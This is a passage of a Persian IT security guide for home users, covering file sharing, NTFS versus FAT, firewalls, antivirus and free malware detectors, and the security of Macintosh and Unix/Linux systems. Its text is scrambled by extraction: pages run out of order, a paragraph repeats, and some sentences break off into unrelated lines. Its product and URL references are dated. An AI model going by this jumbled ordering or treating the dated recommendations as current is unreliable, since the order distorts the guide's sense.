‫ﻣﻲﺑﺎﺷﺪ‪ .‬ﺑـﺮﺍﻱ ﺍﻳﻨﻜـﺎﺭ ﻋﺒـﺎﺭﺕ ﺯﻳـﺮ ﺭﺍ ﺟـﺴﺘﺠﻮ ﻛﻨﻴـﺪ‪:‬‬
‫"‪ "disable file sharing xx‬ﻛـﻪ ﺩﺭ ﺁﻥ ‪ xx‬ﻧـﺴﺨﺔ‬
‫ﻼ ‪ XP‬ﻳﺎ ‪ .2000‬ﺍﮔـﺮ ﺍﺯ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺷﻤﺎ ﻣﻲﺑﺎﺷﺪ؛ ﻣﺜ ﹰ‬
‫ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛـﻪ ﻫـﻴﭻ‬
‫ﺍﻣﺘﻴﺎﺯ ﻏﻴﺮﺿﺮﻭﺭﻱ ﺩﺭ ﺁﻥ ﻓﻌﺎﻝ ﻧﻴﺴﺖ‪.‬‬
‫ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ‬
‫ﺳﺨﺖ ﻳﻚ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﺩﻳﮕﺮ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ‬
‫ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ‪ NTFS‬ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫‪١٢١‬‬
‫ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺿﺪﻭﻳﺮﻭﺱ ﻧﻴﺰ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻩ ﺧـﻮﺩ ﻧـﺼﺐ‬
‫ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ﻧﺘﻮﺍﻧﺴﺘﻴﺪ ﻧﺴﺨﺔ ﺭﺍﻳﮕﺎﻥ ﺁﻧﺮﺍ ﺑﻴﺎﺑﻴﺪ ﺑﺎﻳﺪ ﻫﺰﻳﻨﺔ‬
‫ﻧﺴﺨﺔ ﺗﺠﺎﺭﻱ ﺁﻧﺮﺍ ﺑﭙﺮﺩﺍﺯﻳـﺪ‪ .‬ﺑﺮﺧـﻲ ﺍﺯ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﺑـﺮ‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﻭﺯﺍﻧﺔ ﺿﺪﻭﻳﺮﻭﺳﻬﺎﻱ ﺧـﻮﺩ ﺗﺄﻛﻴـﺪ ﺩﺍﺭﻧـﺪ ﻭ‬
‫ﺑﺮﺧــﻲ ﺩﻳﮕــﺮ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﻫﻔﺘﮕــﻲ ﺁﻧﻬــﺎ ﺭﺍ ﭘﻴــﺸﻨﻬﺎﺩ‬
‫ﻣﻲﻛﻨﻨﺪ‪ .‬ﻃﺒﻴﻌﺘﹰﺎ ﻫﺮﭼﻪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺷﻤﺎ ﺑﻪﺭﻭﺯﺗﺮ ﺑﺎﺷﺪ ﺑﻬﺘـﺮ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺳﻴﺴﺘﻢ ﺣﻔﺎﻇﺖ ﻛﻨﺪ‪.‬‬
‫ﺁﺷﻜﺎﺭﮔﺮﻫﺎﻱ ﺑﺪﺍﻓﺰﺍﺭﻫﺎ‬
‫ﺑﺮﻧﺎﻣﻪﻫـﺎﻳﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺳﻴـﺴﺘﻢ ﺭﺍ ﺑـﺮﺍﻱ ﺍﻧـﻮﺍﻉ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﺟﺴﺘﺠﻮ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻣﺜﻞ‪:‬‬
‫ﺳﻴــــﺴﺘﻤﻬﺎﻱ ﻓﺎﻳــــﻞ ‪ FAT‬ﻭ ‪ FAT32‬ﻛــــﻪ ﺩﺭ‬
‫‪ Windows‬ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲ ﮔﻴﺮﻧﺪ ﺑﻄـﻮﺭ ﻛﺎﻣـﻞ‬
‫ﺍﻳﻤﻦ ﻧﻴﺴﺘﻨﺪ؛ ﺑﺨﺼﻮﺹ ﺍﮔﺮ ﺍﺯ ﺍﺷـﺘﺮﺍﻙ ﻓﺎﻳـﻞ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻛﻨﻴﺪ‪ .‬ﭼﻨﺎﻧﭽﻪ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻓﺎﻳﻠﻬﺎ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﻪ ﺍﻧﺠـﺎﻡ‬
‫ﻣﻲﺷﻮﺩ‪ ،‬ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﺑﺎﻳﺪ ﺍﺯ ﺳﻴﺴﺘﻢ ﻓﺎﻳـﻞ ‪NTFS‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﮔﺮﺩﺩ‪ .‬ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﺩﺭ ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﺩﺳﺘﮕﺎﻩ‬
‫ﺭﺍﻳﺎﻧﻪ ﺷﻤﺎ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﺎ ﺑـﻴﺶ ﺍﺯ ﻳـﻚ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ‬
‫ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺷﻮﺩ ﻳﺎ ﺩﺭ ﺷﺮﺍﻳﻄﻲ ﻛﻪ ﻻﺯﻡ ﺍﺳﺖ ﺑﻪ ﺩﻳـﺴﻚ‬
‫ﻫﻤﮕﻲ ﺑﺮﻧﺎﻣـﻪ ﻫـﺎﻱ ﻓـﻮﻕ ﺭﺍﻳﮕـﺎﻥ ﻫـﺴﺘﻨﺪ ﻭ ﺍﻧـﻮﺍﻉ ﻣﺨﺘﻠـﻒ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲﻧﻤﺎﻳﻨﺪ‪.‬‬
‫‪120 Multi-User‬‬
‫‪121 File System‬‬
‫‪122 System Services‬‬
‫‪Pest Patrol‬‬
‫)‪(http://www.pestpatrol.com‬‬
‫‪Lavasoft‬‬
‫)‪(http://lavasoftusa.com/software/adawareplus/‬‬
‫‪SpybotSD‬‬
‫)‪(http://www.safer-networking.org‬‬
‫‪١٠١‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬
‫ﺑﺮﺭﺳﻲ ﺧﻼﺻﺔ ﺍﻣﻨﻴﺘﻲ‬
‫ﺍﮔﺮ ﺷﻤﺎ ﻳﻚ ﻛﺎﺭﺑﺮ ﻏﻴﺮﻓﻨـﻲ ﻫـﺴﺘﻴﺪ ﻭ ﻫـﻴﭻ ﺳـﺎﺯﻣﺎﻧﻲ‬
‫ﺑﺮﺍﻱ ﻛﻤﻚ ﺑﻪ ﺷﻤﺎ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﻴﺸﻨﻬﺎﺩﺍﺕ‬
‫‪ Microsoft‬ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﺧﺎﻧﮕﻲ ﻧﮕﺎﻫﻲ ﺑﻴﺎﻧﺪﺍﺯﻳﺪ‪:‬‬
‫‪http://www.microsoft.com/security/home‬‬
‫‪http://www.microsoft.com/protect/‬‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴـﺪ ﻛـﻪ ﺍﺯ ﺗﻤـﺎﻣﻲ ﻭﺻـﻠﻪﻫـﺎ ﺑـﺮﺍﻱ‬
‫ﺣﻔﺎﻇــﺖ ﺍﺯ ﺳﻴــﺴﺘﻢ ﺍﺳــﺘﻔﺎﺩﻩ ﻛــﺮﺩﻩﺍﻳــﺪ‪ .‬ﺑــﻪ ﭘﺎﻳﮕــﺎﻩ‬
‫ﺍﻃــﻼﻉﺭﺳــﺎﻧﻲ ‪ http://www.apple.com‬ﺑﺮﻭﻳــﺪ ﻭ‬
‫ﺭﻭﻱ ﮔﺰﻳﻨﺔ ‪ Support‬ﻛﻠﻴﻚ ﻛﻨﻴﺪ‪ .‬ﻣﺸﺎﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ‬
‫‪ ،Windows‬ﺍﻳﻨﺠﺎ ﻫـﻢ ﺍﻳـﻦ ﺍﺣﺘﻤـﺎﻝ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ‬
‫ﺳﻴﺴﺘﻢ ﺍﺻﻼﺡ ﻧﺸﺪﺓ ﺷﻤﺎ ﺑﻌﺪ ﺍﺯ ﺗﻨﻬﺎ ﭼﻨﺪ ﺳﺎﻋﺖ ﻳﺎ ﭼﻨﺪ‬
‫ﺭﻭﺯ ﻣﻮﺭﺩ ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ؛ ﺧـﺼﻮﺻﹰﺎ ﺍﮔـﺮ ﺭﻭﻱ ﺁﻥ ﻳـﻚ‬
‫ﺍﺭﺗﺒﺎﻁ ﺩﺍﺋﻤﻲ ﺷﺒﻜﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪.‬‬
‫‪http://www.microsoft.com/technet/security‬‬
‫ﺍﮔﺮ ﺳﻴﺴﺘﻢ ﺟﺪﻳﺪﻱ ﺩﺍﺭﻳﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ‪ ١٢٣MBSA‬ﺭﺍ ﻛـﻪ‬
‫ﺑــﺮﺍﻱ ﺍﺭﺍﺋــﻪ ﺧــﺪﻣﺎﺕ ﭘــﺸﺘﻴﺒﺎﻧﻲ ﺑــﻪ ﺳﻴــﺴﺘﻤﻬﺎﻱ‬
‫‪ Windows 2000‬ﻭ ‪ Windows XP‬ﻃﺮﺍﺣﻲ ﺷـﺪﻩ‬
‫ﺭﻭﻱ ﺁﻥ ﻧﺼﺐ ﻭ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻛﻨﻴﺪ‪.‬‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ‪Macintosh‬‬
‫ﻧﻘﺎﻁ ﻗﻮﺕ ﻭ ﻧﻘﺎﻁ ﺿﻌﻒ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ‪ Apple Macintosh‬ﻭ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺁﻧﻬﺎ ﻛﻤﺘﺮ ﺍﺯ‬
‫‪ Windows‬ﺭﺍﻳﺎﻧﺔ ﺷﺨﺼﻲ ﭘﺬﻳﺮﺍﻱ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﺑﻌﻼﻭﻩ ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺗﻌﺪﺍﺩ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ‪ Mac‬ﻧﺴﺒﺖ ﺑـﻪ‬
‫ﺭﺍﻳﺎﻧﻪ ﻫﺎﻱ ﺷﺨﺼﻲ ﻛﻤﺘﺮ ﺍﺳﺖ ﻣﻬﺎﺟﻤﺎﻥ ﻋﻼﻗـﺔ ﻛﻤﺘـﺮﻱ ﺑـﻪ‬
‫ﺧﺮﺍﺑﻜﺎﺭﻱ ﺩﺭ ﺁﻧﻬﺎ ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺷﺎﻳﺪ ﺑﺰﺭﮔﺘﺮﻳﻦ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ‬
‫ﺁﻧﻬﺎ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ‪ Mac‬ﺗﺼﻮﺭ ﻣﻲﻛﻨﻨﺪ ﻫﻤﻴﺸﻪ ﺍﻳﻤـﻦ‬
‫ﻫﺴﺘﻨﺪ ﻭ ﻫﻴﭽﮕـﺎﻩ ﻣـﻮﺭﺩ ﺁﺯﺍﺭ ﻭ ﺍﺫﻳـﺖ ﻛـﺴﻲ ﻗـﺮﺍﺭ ﻧﺨﻮﺍﻫﻨـﺪ‬
‫ﮔﺮﻓــﺖ‪ .‬ﺳﻴــﺴﺘﻤﻬﺎﻱ ‪ MacOS‬ﻛــﻪ ﭘــﻴﺶ ﺍﺯ ‪MacOS X‬‬
‫ﺑﻮﺟﻮﺩ ﺁﻣﺪﻧﺪ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻣﻨﺎﺳﺒﺘﺮﻱ ﺩﺍﺷﺘﻨﺪ‪ MacOS X .‬ﺑﺮ‬
‫ﺍﺳﺎﺱ ‪ FreeBSD UNIX‬ﺍﺳﺖ ﻭ ﺑﺎﻳﺪ ﺑﺎ ﺩﻳﺪ ﻳـﻚ ﺳﻴـﺴﺘﻢ‬
‫‪ UNIX‬ﺧﺎﺹ ﻛﻪ ﺑﺎ ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻣﻨﺎﺳﺐ ﻃﺮﺍﺣﻲ ﺷﺪﻩ ﺑﻪ‬
‫ﺁﻥ ﻧﮕﺎﻩ ﻛﺮﺩ )ﺍﻳﻦ ﻣـﻮﺭﺩ ﺩﺭ ﺑﺨـﺶ ﺑﻌـﺪﻱ ﻛـﻪ ﺩﺭ ﻣـﻮﺭﺩ ‪ UNIX‬ﺍﺳـﺖ‬
‫ﺑﺮﺭﺳﻲ ﺷﺪﻩ(‪ .‬ﺩﺭ ﻫﺴﺘﺔ ﻣﺮﻛﺰﻱ ‪ MacOS X‬ﺧﺪﻣﺎﺕ ﺳﻴﺴﺘﻤﻲ‬
‫ﻣﺘﻌﺪﺩﻱ ﺗﻌﺒﻴﻪ ﺷﺪﻩ ﺍﻣﺎ ﻫﻤﺔ ﺁﻧﻬﺎ ﻏﻴﺮﻓﻌﺎﻝ ﻫﺴﺘﻨﺪ‪.‬‬
‫ﭼﮕﻮﻧﻪ ﺍﺯ ﺧﻮﺩ ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴﻢ‬
‫‪123 Microsoft Baseline Security Analyzer‬‬
‫ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ‬
‫ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﺗﻤﺎﻣﻲ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺑﺮﻱ ﻛـﻪ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ‬
‫ﻧﻴﺴﺘﻨﺪ ﻏﻴﺮﻓﻌﺎﻝ ﻳﺎ ﺣﺬﻑ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺧﺼﻮﺻﹰﺎ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ‬
‫ﻛﻪ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ‪ guest‬ﺑـﺪﻭﻥ ﺩﺍﺷـﺘﻦ ﺭﻣـﺰ ﻋﺒـﻮﺭ‬
‫ﻓﻌﺎﻝ ﻧﺒﺎﺷﺪ‪ .‬ﺍﻣﺘﻴﺎﺯﺍﺕ ﺭﺍﻫﺒﺮﻱ ﺭﺍ ﺑﺮﺍﻱ ﺣﺴﺎﺑﻬﺎﻳﻲ ﻛـﻪ ﺍﺯ‬
‫ﺁﻧﻬﺎ ﺯﻳﺎﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻛﻨﻴﺪ ﻣﺤـﺪﻭﺩ ﺳـﺎﺯﻳﺪ ﻭ ﺍﺯ ﺣـﺴﺎﺏ‬
‫ﻛﺎﺭﺑﺮﻱ ﺭﺍﻫﺒﺮ ﺑﺮﺍﻱ ﻛﺎﺭﻫﺎﻱ ﺭﻭﺯﻣـﺮﻩ ﻛـﻪ ﺑـﺪﻭﻥ ﺍﻣﺘﻴـﺎﺯ‬
‫ﺭﺍﻫﺒﺮﻱ ﻗﺎﺑﻞ ﺍﻧﺠﺎﻡ ﻫﺴﺘﻨﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻴﺪ‪.‬‬
‫ﺍﺷﺘﺮﺍﻙ ﻓﺎﻳﻞ‬
‫ﺍﮔﺮ ﺍﺯ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﻲﻛﻨﻴﺪ ﺁﻧﺮﺍ ﻏﻴﺮﻓﻌﺎﻝ ﺳﺎﺯﻳﺪ‪.‬‬
‫ﺩﺭ ﻏﻴﺮﺍﻳﻨﺼﻮﺭﺕ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺗﻌﻴـﻴﻦﺷـﺪﻩ‬
‫ﺩﺭ ﺣﺪﺍﻗﻞ ﺳﻄﺢ ﻣﻤﻜﻦ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ‪.‬‬
‫ﺧﺪﻣﺎﺕ‬
‫ﺧﺪﻣﺎﺗﻲ ﻛﻪ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻧﻴـﺴﺘﻨﺪ ﺭﺍ ﻏﻴﺮﻓﻌـﺎﻝ ﺳـﺎﺯﻳﺪ‪ .‬ﺍﮔـﺮ‬
‫ﺁﻧﻬﺎ ﺭﺍ ﺑﻄﻮﺭ ﻣﻮﻗﺘﻲ ﻓﻌﺎﻝ ﻣﻲﻛﻨﻴﺪ ﻳﺎﺩﺗﺎﻥ ﺑﺎﺷﺪ ﻛﻪ ﭘـﺲ‬
‫ﺍﺯ ﺍﺗﻤﺎﻡ ﻛﺎﺭ ﻣﺠﺪﺩﹰﺍ ﻫﻤﮕﻲ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺟﺪﻳﺪ‬
‫ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺟﺪﻳﺪ ﻣﺮﺗﺒﻂ ﺑـﺎ ﺷـﺒﻜﻪ )ﺧـﺼﻮﺻﹰﺎ‬
‫ﺁﻧﻬﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ‪ UNIX‬ﻃﺮﺍﺣـﻲ ﺷـﺪﻩ ﺍﻧـﺪ( ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﺭ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﻗﺒﻞ ﺍﺯ ‪MacOS X‬ﻫﺎ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ‬
‫ﺁﺳﻴﺐ ﭘﺬﻳﺮ ﺑﺎﺷﻨﺪ‪ .‬ﺍﮔﺮ ﭼﻨﻴﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻧﺼﺐ ﻛـﺮﺩﻩﺍﻳـﺪ‬
‫ﻣﺮﺍﻗﺐ ﺍﻳﻦ ﻣﻮﺿﻮﻉ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﺑﺨﺶ ﺩﻭﻡ‬
‫ﺍﮔﺮ ﻣﺘﺨﺼﺺ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻫﺴﺘﻴﺪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﺍﻳﻦ‬
‫ﭘﺎﻳﮕﺎﻩ ﺍﻃﻼﻉﺭﺳﺎﻧﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪:‬‬
‫ﺍﻧﺘﺸﺎﺭ ﻧﺮﻡﺍﻓﺰﺍﺭ‬
‫‪١٠٢‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ‬
‫ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗـﺶ ﺳـﺨﺖﺍﻓـﺰﺍﺭﻱ ﻳـﺎ ﻧـﺮﻡﺍﻓـﺰﺍﺭﻱ ﺭﻭﻱ‬
‫ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﻧﺼﺐ ﻛﻨﻴﺪ ﻭ ﺁﻧﺮﺍ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺭﻳﺪ‪ .‬ﻣﻄﻤـﺌﻦ‬
‫ﺷﻮﻳﺪ ﻛﻪ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻨﻈـﻴﻢ ﺷـﺪﻩﺍﺳـﺖ ﻛـﻪ‬
‫ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﻫﺮ ﺍﺗﻔـﺎﻕ ﻏﻴﺮﻋـﺎﺩﻱ ﺑـﻪ ﺷـﻤﺎ ﻫـﺸﺪﺍﺭ‬
‫ﻣﻲﺩﻫﺪ‪.‬‬
‫ﺿﺪﻭﻳﺮﻭﺱ‬
‫ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺿﺪﻭﻳﺮﻭﺱ ﻧﻴﺰ ﺭﻭﻱ ﺩﺳﺘﮕﺎﻩ ﺧـﻮﺩ ﻧـﺼﺐ‬
‫ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ﻧﺘﻮﺍﻧﺴﺘﻴﺪ ﻧﺴﺨﺔ ﺭﺍﻳﮕﺎﻥ ﺁﻧﺮﺍ ﺑﻴﺎﺑﻴﺪ ﺑﺎﻳﺪ ﻫﺰﻳﻨﺔ‬
‫ﻧﺴﺨﺔ ﺗﺠﺎﺭﻱ ﺁﻧﺮﺍ ﺑﭙﺮﺩﺍﺯﻳـﺪ‪ .‬ﺑﺮﺧـﻲ ﺍﺯ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﺑـﺮ‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﻭﺯﺍﻧﺔ ﺿﺪﻭﻳﺮﻭﺳﻬﺎﻱ ﺧـﻮﺩ ﺗﺄﻛﻴـﺪ ﺩﺍﺭﻧـﺪ ﻭ‬
‫ﺑﺮﺧــﻲ ﺩﻳﮕــﺮ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﻫﻔﺘﮕــﻲ ﺁﻧﻬــﺎ ﺭﺍ ﭘﻴــﺸﻨﻬﺎﺩ‬
‫ﻣﻲﻛﻨﻨﺪ‪ .‬ﻃﺒﻴﻌﺘﹰﺎ ﻫﺮﭼﻪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺷﻤﺎ ﺑﻪﺭﻭﺯﺗﺮ ﺑﺎﺷﺪ ﺑﻬﺘـﺮ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺳﻴﺴﺘﻢ ﺣﻔﺎﻇﺖ ﻛﻨﺪ‪.‬‬
‫‪ ،Linux ،UNIX‬ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺸﺎﺑﻪ‬
‫ﻧﻘﺎﻁ ﻗﻮﺕ ﻭ ﻧﻘﺎﻁ ﺿﻌﻒ‬
‫ﺳﻴــﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﺍﺯ ﺍﺑﺘــﺪﺍﻱ ﭘﻴــﺪﺍﻳﺶ ﺩﺭ ﻣﺤﻴﻄﻬــﺎﻱ ﻋﻠــﻮﻡ‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﻓﻴﺰﻳﻜﻲ ﺑﻌﻨﻮﺍﻥ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ‪ ١٢٤‬ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﻩ‬
‫)ﻫﻢ ﺑﺮﺍﻱ ﺧﺪﻣﺎﺕ ﺳﻴﺴﺘﻤﻲ ﻭ ﻫﻢ ﺑـﺮﺍﻱ ﻣﺤﺎﺳـﺒﺎﺕ ﭼﻨـﺪﻛﺎﺭﺑﺮﻱ( ﺑﻜـﺎﺭ‬
‫ﻣﻲﺭﻓﺘﻨﺪ ﻭ ﻃﻲ ﺩﻫـﺔ ﮔﺬﺷـﺘﻪ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ ‪ Windows‬ﻭ‬
‫‪ - Macintosh‬ﻛﻪ ﺩﺭ ﻣﺤﻴﻄﻬﺎﻱ ﺩﻳﮕﺮ ﺍﻳﺴﺘﮕﺎﻩﻫـﺎﻱ ﻛـﺎﺭﻱ‬
‫ﺗﻚﻛﺎﺭﺑﺮﻩ‪ ١٢٥‬ﺑﻮﺩﻧﺪ ‪ -‬ﺗﺎ ﺣﺪﻭﺩﻱ ﭘﻴﺸﻲ ﮔﺮﻓﺘﻨﺪ‪ .‬ﺑـﺎ ﻣﺤﺒﻮﺑﻴـﺖ‬
‫ﺭﻭ ﺑﻪ ﺍﻓﺰﺍﻳﺶ ‪ Linux‬ﺍﻳﻦ ﭘﺪﻳﺪﻩ ﮔﺴﺘﺮﺵ ﻳﺎﻓﺖ؛ ﺯﻳـﺮﺍ ﺍﺯ ﻳـﻚ‬
‫ﺳﻮ ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﺑﺴﻴﺎﺭ ﺟﺎﻟـﺐ ﻭ ﺟـﺬﺍﺏ ﺑـﻮﺩ ﻭ ﺍﺯ ﺳـﻮﻱ ﺩﻳﮕـﺮ‬
‫ﺑــﺮﺧﻼﻑ ‪ Windows‬ﻣــﺘﻦ ﺑﺮﻧﺎﻣــﺔ ﺁﻥ ﺑــﺼﻮﺭﺕ ﺭﺍﻳﮕــﺎﻥ ﺩﺭ‬
‫ﺍﺧﺘﻴﺎﺭ ﻋﻤﻮﻡ ﻗﺮﺍﺭ ﮔﺮﻓﺖ‪ .‬ﺍﻳﻦ ﻣﻮﺿـﻮﻉ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ‬
‫ﺗﻮﺳﻌﻪ ﺑﻴﺶ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﺩﺭ ﻛﺎﻧﻮﻥ ﺗﻮﺟﻪﻫﺎ ﻭﺍﻗـﻊ‬
‫ﺷﺪ؛ ﭼﺮﺍﻛﻪ ﻫﺰﻳﻨﺔ ﺗﻬﻴﺔ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ‬
‫ﺩﺭ ﻣﻘﺎﻳﺴﻪ ﺑﺎ ﻣﺘﻮﺳﻂ ﺳﻄﺢ ﺩﺭﺁﻣﺪ ﺍﻓﺮﺍﺩ ﺑﺴﻴﺎﺭ ﺑﺎﻻﺗﺮ ﻣﻲﺑﺎﺷـﺪ‪.‬‬
‫ﺍﺯ ﻧﻘﺎﻁ ﻗﻮﺕ ‪ UNIX‬ﻣﻲﺗـﻮﺍﻥ ﺑـﻪ ﺍﻧﻌﻄـﺎﻑﭘـﺬﻳﺮﻱ ﺁﻥ ﻭ ﻧﻴـﺰ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺷـﺮﻛﺘﻬﺎ ﻃـﻲ ﺍﻳـﻦ ﺳـﺎﻟﻬﺎ‬
‫ﺑﺮﺍﻱ ﺁﻥ ﺗﻮﻟﻴﺪ ﺷﺪﻩﺍﻧﺪ ﺍﺷﺎﺭﻩ ﻛﺮﺩ‪.‬‬
‫‪124 Workstation‬‬
‫‪125 Single-User‬‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﻗﺪﺭﺕ ﻭ ﺍﻧﻌﻄﺎﻑ ﭘﺬﻳﺮﻱ ‪ UNIX‬ﺑﺎ ﻛﺎﺭﺑﺮﭘـﺴﻨﺪ ﺑـﻮﺩﻥ‬
